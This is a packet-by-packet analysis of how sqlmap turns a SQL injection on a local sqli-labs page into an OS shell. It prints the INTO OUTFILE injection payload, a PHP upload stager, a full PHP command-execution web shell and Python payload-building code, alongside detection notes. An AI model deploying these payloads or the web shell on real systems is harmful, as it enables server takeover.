A packet-capture analysis of how sqlmap obtains an os-shell


    The complete run, executed locally

    D:\sqlmap>python2 sqlmap.py -u http://127.0.0.1/SQL/Less-1/?id=1 --os-shell
            ___
           __H__
     ___ ___[)]_____ ___ ___  {1.2.11#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 23:10:10
    
    [23:10:10] [INFO] resuming back-end DBMS 'mysql'
    [23:10:10] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 3621=3621 AND 'GLUP'='GLUP
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT (ELT(3041=3041,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ErWL'='ErWL
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'spJe'='spJe
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 3 columns
        Payload: id=-3185' UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4362634876576a754d757a6b534357506b55784569476b68786c616f6179476a796c464c6479666e,0x7171787a71),NULL-- KQNY
    ---
    [23:10:10] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.4.37, PHP 5.6.37
    back-end DBMS: MySQL >= 5.0
    [23:10:10] [INFO] going to use a web backdoor for command prompt
    [23:10:10] [INFO] fingerprinting the back-end DBMS operating system
    [23:10:10] [INFO] the back-end DBMS operating system is Windows
    which web application language does the web server support?
    [1] ASP (default)
    [2] ASPX
    [3] JSP
    [4] PHP
    > 4
    do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
    [23:10:27] [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    > 2
    please provide a comma separate list of absolute directory paths: E:\www\apache\Apache24\htdocs
    [23:10:50] [WARNING] unable to automatically parse any web server path
    [23:10:50] [INFO] trying to upload the file stager on 'E:/www/apache/Apache24/htdocs/' via LIMIT 'LINES TERMINATED BY' method
    [23:10:50] [INFO] the file stager has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpumgnt.php
    [23:10:50] [INFO] the backdoor has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpbwejn.php
    [23:10:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell> whoami
    do you want to retrieve the command standard output? [Y/n/a]
    command standard output:    'desktop-ei9lgn7\xscope'
    os-shell>
    

    Running the process above produced 22 HTTP packets on the local machine: 11 requests and 11 responses. They are analysed one by one below.

    0x01

    Request
    GET /SQL/Less-1/?id=1 HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    

    This first request is a plain GET with the original parameter. It is the connectivity check ("testing connection to the target URL" in the log) and also gives sqlmap a baseline copy of the page to compare later responses against.

    Note the User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org). That is sqlmap's default and the easiest thing to alert on; --random-agent or --user-agent replaces it, so a detection that relies on it alone misses anyone who bothered to change it.

    The local server returns the normal page: the 721-byte body below includes the record for id=1 (login name Dumb, password Dumb).

    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:10 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 721
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Less-1 **Error Based- String**</title>
    </head>
    <body bgcolor="#000000">
    <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
    <font size="3" color="#FFFF00"> 
    <font size='5' color= '#99FF00'>Your Login name:Dumb<br>Your Password:Dumb</font></font> </div></br></br></br><center>
    <img src="../images/Less-1.jpg" /></center>
    </body>
    </html>
    

    0x02

    Request
    GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    

    This request is sent after the following prompt and warning:
    do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
    [23:10:27] [WARNING] unable to automatically retrieve the web server document root

    sqlmap has appended %5B%5D to the parameter name; URL-decoded that is [], so the request is id[]=1 and PHP builds $_GET['id'] as an array instead of a string. This is the "provoke the full path disclosure" step: when an array lands in string context (here the concatenation into "WHERE id='$id'"), PHP raises "Array to string conversion", and with display_errors on the notice prints the absolute path of the script, from which sqlmap derives the document root. sqlmap applies the same mutation to POST parameters when the injection is there.

    Here the trick fails: the response is the 670-byte empty-result page (the query ran with id='Array', matched nothing, and no notice was printed), which is why the warning above appears and the writable directory then has to be typed in by hand. The response differs from the first one only in the missing login name and password:

    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:27 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 670
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Less-1 **Error Based- String**</title>
    </head>
    <body bgcolor="#000000">
    <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
    <font size="3" color="#FFFF00">
    <font color= "#FFFF00"></font></font> </div></br></br></br><center>
    <img src="../images/Less-1.jpg" /></center>
    </body>
    </html>
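    The probe above, re-implemented as an added example (this is not sqlmap's code, and the two response bodies are constructed for the example: one with display_errors on, where the notice leaks the script path, and one that stays silent as in this capture). The helper names are mine, and the URL path /SQL/Less-1/index.php is assumed to be what the directory request /SQL/Less-1/ resolves to.

```python
import re
from urllib.parse import parse_qsl, quote

def arrayize_query(query):
    """'id=1' -> 'id%5B%5D=1': suffix every parameter name with [] so that PHP
    builds $_GET['id'] as an array instead of a string."""
    pairs = parse_qsl(query, keep_blank_values=True)
    return "&".join(f"{quote(k)}%5B%5D={quote(v)}" for k, v in pairs)

# Absolute script paths the way PHP prints them in a notice/warning, e.g.
#   ... in <b>E:\www\apache\Apache24\htdocs\SQL\Less-1\index.php</b> on line <b>29</b>
PATH_RE = re.compile(r"""(?:[A-Za-z]:\\[^<>"'\r\n]+?|/[^<>"'\r\n ]+?)\.php\b""")

def extract_paths(page):
    """Unique leaked script paths, in order of appearance."""
    return list(dict.fromkeys(m.group(0) for m in PATH_RE.finditer(page)))

def docroot_from_leak(script_path, url_path):
    """Peel the URL path (/SQL/Less-1/index.php) off the end of the leaked
    filesystem path; None if the two do not line up."""
    sep = "\\" if re.match(r"[A-Za-z]:\\", script_path) else "/"
    fs_parts = script_path.split(sep)
    url_parts = [p for p in url_path.split("/") if p]
    if not url_parts or fs_parts[-len(url_parts):] != url_parts:
        return None
    return sep.join(fs_parts[:-len(url_parts)])

# Constructed responses (not from the capture): a leak as produced with
# display_errors=On, and the silent empty-result page this capture actually got.
LEAKY_PAGE = ('<br />\n<b>Notice</b>:  Array to string conversion in '
              '<b>E:\\www\\apache\\Apache24\\htdocs\\SQL\\Less-1\\index.php</b> '
              'on line <b>29</b><br />\n<html><body>Welcome Dhakkan</body></html>')
SILENT_PAGE = '<html><body>Welcome Dhakkan<font color= "#FFFF00"></font></body></html>'

def probe(query, response_page, url_path):
    """One FPD probe: the mutated query to send, the paths the response leaked,
    and the document root derived from the first one (None when nothing leaked)."""
    paths = extract_paths(response_page)
    root = docroot_from_leak(paths[0], url_path) if paths else None
    return arrayize_query(query), paths, root

if __name__ == "__main__":
    for page in (LEAKY_PAGE, SILENT_PAGE):
        print(probe("id=1", page, "/SQL/Less-1/index.php"))
```

    With the leaky page the root comes back as E:\www\apache\Apache24\htdocs; with the silent page nothing is recovered, which is the situation the warning in the log describes.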
    

    0x03

    Request
    GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%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--%20- HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    

    The third request carries a very long parameter. URL-decoded, and with the file body (which sqlmap sends as a MySQL hex literal, 0x3c3f7068...) decoded back to text, it reads:

    id=-1086' OR 3105=3105 LIMIT 0,1 INTO OUTFILE 'E:/www/apache/Apache24/htdocs/tmpumgnt.php' LINES TERMINATED BY <?php
    if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>";}?>
    

    The file is written with MySQL's SELECT ... INTO OUTFILE, using the LINES TERMINATED BY clause to carry the payload. Two details matter. First, the injected text is appended to the tail of the application's SELECT (after an OR 3105=3105 that makes the WHERE true), and the closing "-- -" comments out the application's own LIMIT 0,1, so the statement stays valid; this works with any injection point at the end of a SELECT and does not depend on a UNION. Second, the file body is not a selected column: MySQL writes the one selected row (fields separated by tabs) and then appends the line terminator, i.e. the PHP source, which is why the stager, when fetched later, begins with "1 Dumb Dumb". The hex encoding is what keeps the quotes and backslashes in the PHP intact on the way through the query. INTO OUTFILE needs the FILE privilege, a secure_file_priv setting that allows the target directory, and a MySQL service account with write access there; in this local setup all three held.

    The code, expanded:

    <?php
    if (isset($_REQUEST["upload"])){
        $dir=$_REQUEST["uploadDir"];
        if (phpversion()<'4.1.0'){
            $file=$HTTP_POST_FILES["file"]["name"];
            @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
        }
        else{
            $file=$_FILES["file"]["name"];
            @move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
        }@chmod($dir."/".$file,0755);
        echo "File uploaded";
    }
    else {
    echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>";
    }?>
    

    It is a minimal file uploader: when the upload field is present it moves the posted file into uploadDir and chmods it 0755, otherwise it prints the upload form. The value=E:\www\apache\Apache24\htdocs\ default in the form is the directory entered at the prompt, converted to Windows separators.

    The response is byte-for-byte the same as the second one. That is expected: with INTO OUTFILE the selected row goes to the file instead of to the client, so the application fetches no row and renders its empty-result page. The HTTP response therefore says nothing about whether the write succeeded; sqlmap finds that out with the next requests.

    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 670
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Less-1 **Error Based- String**</title>
    </head>
    <body bgcolor="#000000">
    <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
    <font size="3" color="#FFFF00"> 
    <font color= "#FFFF00"></font></font> </div></br></br></br><center>
    <img src="../images/Less-1.jpg" /></center>
    </body>
    </html>
    

    Requests four to eight all serve to locate the written file over HTTP. sqlmap does not know which part of E:/www/apache/Apache24/htdocs/ is the document root, so it strips one leading directory per attempt (/www/apache/Apache24/htdocs/, /apache/Apache24/htdocs/, /Apache24/htdocs/, /htdocs/, /) and requests tmpumgnt.php under each until a body contains the "sqlmap file uploader" marker; the number of attempts is therefore the depth of the directory entered at the prompt. Four 404s followed by one 200 for the same file name, all within the same second, is a distinctive pattern in the access log.
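    The two mechanisms of 0x03 and 0x04 to 0x08 as an added example, not sqlmap's own code: how the payload is assembled, an approximation of what MySQL actually writes to the file (which explains the "1 Dumb Dumb" prefix seen when the stager is fetched), and the list of URLs tried to find it. The row, directory, file name and prefix are the ones visible in the capture; the stager body is shortened to a stand-in and the helper names are mine.

```python
from urllib.parse import urljoin

# Stand-in for the stager body (the real one is the PHP uploader shown in 0x03).
STAGER = b'<?php echo "<b>sqlmap file uploader</b>"; ?>'

def hex_literal(data):
    """MySQL hex literal (0x3c3f7068...): no quotes, so the quotes and
    backslashes inside the PHP survive the trip through the query untouched."""
    return "0x" + data.hex()

def build_write_payload(outfile, content, prefix="-1086' OR 3105=3105"):
    """The 0x03 parameter value: make the WHERE true, tail the SELECT with
    LIMIT 0,1 INTO OUTFILE ... LINES TERMINATED BY <hex>, and comment out the
    application's own trailing LIMIT with '-- -'."""
    return (f"{prefix} LIMIT 0,1 INTO OUTFILE '{outfile}' "
            f"LINES TERMINATED BY {hex_literal(content)}-- -")

def simulate_into_outfile(rows, line_term, field_term=b"\t", esc=b"\\"):
    r"""Approximation of what the server writes for SELECT ... INTO OUTFILE with
    the default FIELDS TERMINATED BY '\t' ESCAPED BY '\\': each row's fields
    joined by the field terminator and followed by the line terminator (here
    the PHP). NULL is written as \N; the escape byte and the first byte of
    either terminator are backslash-prefixed when they occur in field data."""
    special = {esc[0], field_term[0], line_term[0]}

    def enc(value):
        if value is None:
            return esc + b"N"
        raw = str(value).encode()
        return b"".join(esc + bytes([b]) if b in special else bytes([b]) for b in raw)

    return b"".join(field_term.join(enc(v) for v in row) + line_term for row in rows)

def stager_candidates(base_url, directory, stager_name):
    """The URLs tried in 0x04-0x08: one per '/' in the directory, dropping a
    leading component each time, so the last candidate is the web root."""
    return [urljoin(base_url, directory[i:].rstrip("/") + "/" + stager_name)
            for i, ch in enumerate(directory) if ch == "/"]

if __name__ == "__main__":
    print(build_write_payload("E:/www/apache/Apache24/htdocs/tmpumgnt.php", STAGER))
    # the written file starts with the selected row, then the PHP
    print(simulate_into_outfile([(1, "Dumb", "Dumb")], STAGER))
    for url in stager_candidates("http://127.0.0.1:80/", "E:/www/apache/Apache24/htdocs/", "tmpumgnt.php"):
        print(url)
```

    The simulator also shows the edge case that makes this write fragile: if a field of the selected row happened to contain the first byte of the PHP ("<"), MySQL would escape it, and row data is emitted before the PHP in any case, so the file is only a valid script because PHP ignores everything before the opening tag.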

    0x04

    Request
    GET /www/apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    Content-Length: 237
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /www/apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
    </body></html>
    

    0x05

    Request
    GET /apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    Content-Length: 233
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
    </body></html>
    

    0x06

    Request
    GET /Apache24/htdocs/tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    Content-Length: 226
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
    </body></html>
    

    0x07

    Request
    GET /htdocs/tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    Content-Length: 217
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /htdocs/tmpumgnt.php was not found on this server.</p>
    </body></html>
    

    0x08

    Request
    GET /tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    
    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 330
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    1	Dumb	Dumb<form action=/tmpumgnt.php method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>
    

    0x09

    Request
    POST /tmpumgnt.php?id=1 HTTP/1.1
    Content-Length: 1334
    Accept-Encoding: gzip,deflate
    Connection: close
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Host: 127.0.0.1
    Cache-Control: no-cache
    Content-Type: multipart/form-data; boundary=169.254.227.55.1.10780.1558019450.459.1
    
    --169.254.227.55.1.10780.1558019450.459.1
    Content-Disposition: form-data; name="uploadDir"
    
    E:\www\apache\Apache24\htdocs
    --169.254.227.55.1.10780.1558019450.459.1
    Content-Disposition: form-data; name="upload"
    
    1
    --169.254.227.55.1.10780.1558019450.459.1
    Content-Disposition: form-data; name="file"; filename="tmpbwejn.php"
    Content-Type: application/octet-stream
    
    <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1
    ";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
    --169.254.227.55.1.10780.1558019450.459.1--
    

    Two things are worth noting before the code. The upload goes to the stager found in 0x08, with the directory entered at the prompt as uploadDir and the backdoor tmpbwejn.php as the file; the stager then moves it into place. And the multipart boundary, 169.254.227.55.1.10780.1558019450.459.1, is the one Python 2's mimetools.choose_boundary() produces: host IP address, uid (1 on Windows, where os.getuid() does not exist), process id, time.time() to three decimals and a random seed. It leaks the attacking machine's local address and process id into the server's logs and is itself a usable fingerprint.

    The code, expanded:

    <?php 
    $c=$_REQUEST["cmd"];
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time',0);
    $z=@ini_get('disable_functions');
    if(!empty($z)){
        $z=preg_replace('/[, ]+/',',',$z);
        $z=explode(',',$z);
        $z=array_map('trim',$z);
    }
    else{
        $z=array();
    }
    $c=$c." 2>&1
    ";
    function f($n){
        global $z;
        return is_callable($n)and!in_array($n,$z);
    }
    if(f('system')){
        ob_start();
        system($c);
        $w=ob_get_contents();
        ob_end_clean();
    }
    elseif(f('proc_open')){
        $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
        $w=NULL;
        while(!feof($t[1])){
            $w.=fread($t[1],512);
        }
        @proc_close($y);
    }
    elseif(f('shell_exec')){
        $w=shell_exec($c);
    }
    elseif(f('passthru')){
        ob_start();
        passthru($c);
        $w=ob_get_contents();
        ob_end_clean();
    }
    elseif(f('popen')){
        $x=popen($c,r);
        $w=NULL;
        if(is_resource($x)){
            while(!feof($x)){
                $w.=fread($x,512);
            }
        }
        @pclose($x);
    }
    elseif(f('exec')){
        $w=array();
        exec($c,$w);
        $w=join(chr(10),$w).chr(10);
    }
    else{
        $w=0;
    }
    print "<pre>".$w."</pre>";?>
    

    The script first takes the cmd value from the request and stores it in $c.

    It removes the execution time limit (set_time_limit(0) and max_execution_time=0), so a long-running command is not killed.

    It sets ignore_user_abort(1), so the command keeps running even if the client disconnects.

    It reads the disable_functions list from the PHP configuration into $z.

    If $z is not empty:

    • every run of commas and/or spaces is replaced by a single comma
    • the list is split on commas into an array
    • the whitespace around each element is trimmed

    Otherwise $z is initialised as an empty array.

    Then $c=$c." 2>&1\n": stderr is redirected into stdout so that error output is captured as well (the line break inside the string literal is genuine).

    The function f($n) is defined:

    • it reads the global $z
    • it returns true if $n is callable and not in $z, false otherwise

    What follows is a fallback chain: each execution primitive is tried in turn and the first one that is neither missing nor listed in disable_functions is used, which is the standard way of getting past an incomplete disable_functions list. The explicit list comparison is there because the PHP callability check does not, on every PHP version, reflect disable_functions.

    If f('system') is true:

    • start output buffering
    • run the command $c with system()
    • copy the buffer into $w
    • discard the buffer and stop buffering

    Else if f('proc_open') is true:

    • spawn a child process running $c, with pipes for stdin, stdout and stderr (pipe, r and w are written unquoted; PHP 5 treats the undefined constants as the strings 'pipe', 'r', 'w' with a notice, while PHP 8 throws an Error, so this branch would fail there)
    • read the command output from the stdout pipe $t[1] into $w
    • close the process

    Else if f('shell_exec') is true:

    • run the command through the shell and store the output in $w

    Else if f('passthru') is true:

    • start output buffering
    • run the command
    • copy the buffer into $w
    • discard the buffer and stop buffering

    Else if f('popen') is true:

    • open a read pipe to the process, which returns a file pointer $x just as fopen() would
    • read everything from $x into $w
    • close $x

    Else if f('exec') is true:

    • initialise $w as an empty array
    • run the command, filling $w with one element per output line
    • join the array with chr(10) into a string

    Otherwise:

    • $w = 0

    Finally, print "<pre>".$w."</pre>".

    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 24
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    1	Dumb	DumbFile uploaded
    

    0x0a

    Request
    GET /tmpbwejn.php?cmd=echo%20command%20execution%20test HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 36
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <pre>command execution test 
    </pre>
    

    0x0b

    Request
    GET /tmpbwejn.php?cmd=whoami HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:11:08 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 36
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <pre>desktop-ei9lgn7\xscope
    </pre>
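    Request 0x0a is sqlmap's own check that the backdoor works (cmd=echo command execution test, looking for the echoed string in the response), and 0x0b is the whoami typed at the os-shell prompt. Pulling the eleven requests together from the defender's side, here is detection logic as an added example (not part of the original post): it runs over constructed access-log lines in Apache combined format that mirror the capture, plus one benign request, and tags the sqlmap User-Agent, the [] full-path-disclosure probe, the INTO OUTFILE write, the tmp*.php stager/backdoor names, the stager upload, and the cmd= execution. The hex file body in the third line is cut short, and the rule names and thresholds are mine.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed log lines (not from the capture's pcap) mirroring requests 0x01-0x0b,
# followed by one benign browser request.
SAMPLE_LOG = """\
127.0.0.1 - - [16/May/2019:23:10:10 +0800] "GET /SQL/Less-1/?id=1 HTTP/1.1" 200 721 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:27 +0800] "GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1" 200 670 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:50 +0800] "GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%200x3c3f706870--%20- HTTP/1.1" 200 670 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:50 +0800] "GET /www/apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1" 404 237 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:50 +0800] "GET /apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1" 404 233 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:50 +0800] "GET /Apache24/htdocs/tmpumgnt.php HTTP/1.1" 404 226 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:50 +0800] "GET /htdocs/tmpumgnt.php HTTP/1.1" 404 217 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:50 +0800] "GET /tmpumgnt.php HTTP/1.1" 200 330 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
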